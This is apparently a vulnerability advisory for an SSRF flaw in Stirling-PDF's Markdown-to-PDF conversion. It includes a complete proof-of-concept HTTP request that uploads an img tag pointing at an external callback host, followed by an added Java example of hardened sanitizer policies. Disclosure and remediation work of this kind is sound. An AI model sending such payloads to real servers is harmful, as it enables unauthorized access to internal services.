Summary

When using the /api/v1/convert/markdown/pdf endpoint to convert Markdown to PDF, the backend hands the input to a third-party tool and runs a sanitizer over it first, but the sanitization has flaws that can be bypassed, leading to SSRF.

Details

The backend uses the third-party sanitizer org.owasp.html, but it has flaws that can be bypassed, leading to SSRF.

source:
stirling/software/SPDF/controller/api/converters/ConvertMarkdownToPdf.java

sink:
stirling/software/SPDF/utils/FileToPdf.java

PoC

The request below uploads a Markdown file whose only content is an img tag with a src pointing at an external host:

POST /api/v1/convert/markdown/pdf HTTP/1.1
Host: 172.25.24.140:8080
Content-Length: 247
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK
Accept: */*
Origin: http://172.25.24.140:8080
Referer: http://172.25.24.140:8080/markdown-to-pdf
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node0dylx4lgdtzxwixmnid86661r1.node0
Connection: close

------WebKitFormBoundaryvAfAbBmFpYrQfooK
Content-Disposition: form-data; name="fileInput"; filename="ssrf.md"
Content-Type: application/octet-stream

<img src='http://e6c4490692.ipv6.bypass.eu.org/'>
------WebKitFormBoundaryvAfAbBmFpYrQfooK--

Impact

Here are two articles that introduce the principles and risks of SSRF for your reference.
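An added example, not code from the Stirling-PDF project or from this advisory, showing the policy shape that matters for the Details section above: with org.owasp.html, an image policy that admits http/https src values leaves the PDF renderer with a URL to fetch server-side, while a policy that only admits inline data: images strips every remote reference before rendering. The class name, the regex and the constructed inputs are assumptions; the example does not reproduce the specific bypass, which the advisory does not describe, and it complements rather than replaces egress restrictions on the rendering host.

```java
// Added example (assumption: not Stirling-PDF's own code). Two org.owasp.html
// policies applied to the HTML a Markdown converter produces before it is
// handed to a PDF renderer that resolves image URLs server-side.
import java.util.regex.Pattern;
import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;

public class MarkdownImagePolicy {

    // Permissive policy: <img src="http(s)://..."> passes sanitization intact.
    // A renderer that fetches image URLs will then issue the outbound request,
    // which is the SSRF primitive the advisory describes.
    static final PolicyFactory REMOTE_IMAGES_ALLOWED = new HtmlPolicyBuilder()
            .allowUrlProtocols("http", "https")
            .allowElements("img")
            .allowAttributes("alt", "src").onElements("img")
            .toFactory();

    // Hardened policy: only inline base64 raster images survive. Any src with a
    // network scheme (http, https, ftp, file, ...) is dropped, so the renderer
    // never receives a URL to fetch. The pattern is an assumption for this example.
    private static final Pattern INLINE_IMAGE = Pattern.compile(
            "^data:image/(?:png|jpeg|gif);base64,[A-Za-z0-9+/]+=*$");

    static final PolicyFactory INLINE_IMAGES_ONLY = new HtmlPolicyBuilder()
            .allowUrlProtocols("data")
            .allowElements("img")
            .allowAttributes("alt").onElements("img")
            .allowAttributes("src").matching(INLINE_IMAGE).onElements("img")
            .toFactory();

    // Returns the sanitized HTML for one Markdown-derived fragment under the
    // chosen policy; callers should feed only the result to the PDF renderer.
    static String sanitizeForPdf(PolicyFactory policy, String html) {
        return policy.sanitize(html);
    }

    public static void main(String[] args) {
        // Constructed input modelled on the PoC: a remote image in the body.
        String remote = "<img src='http://ssrf-target.invalid/'>";
        // Constructed inline image (1x1 transparent GIF), the only kind the
        // hardened policy keeps.
        String inline = "<img src='data:image/gif;base64,"
                + "R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'>";

        // Remote src survives here: the renderer would fetch it.
        System.out.println(sanitizeForPdf(REMOTE_IMAGES_ALLOWED, remote));
        // Remote src is stripped here: nothing is left for the renderer to fetch.
        System.out.println(sanitizeForPdf(INLINE_IMAGES_ONLY, remote));
        // Inline image is preserved, so legitimate embedded images still render.
        System.out.println(sanitizeForPdf(INLINE_IMAGES_ONLY, inline));
    }
}
```

The design choice is to remove the fetch capability at the sanitizer rather than to allowlist hosts: a host allowlist has to keep up with DNS rebinding and redirect tricks, whereas a data:-only image policy leaves the renderer with no network target at all. Where remote images are a product requirement, the fetch should go through a dedicated client that resolves the hostname once, rejects loopback, link-local and private ranges, and is blocked by egress filtering from reaching internal services.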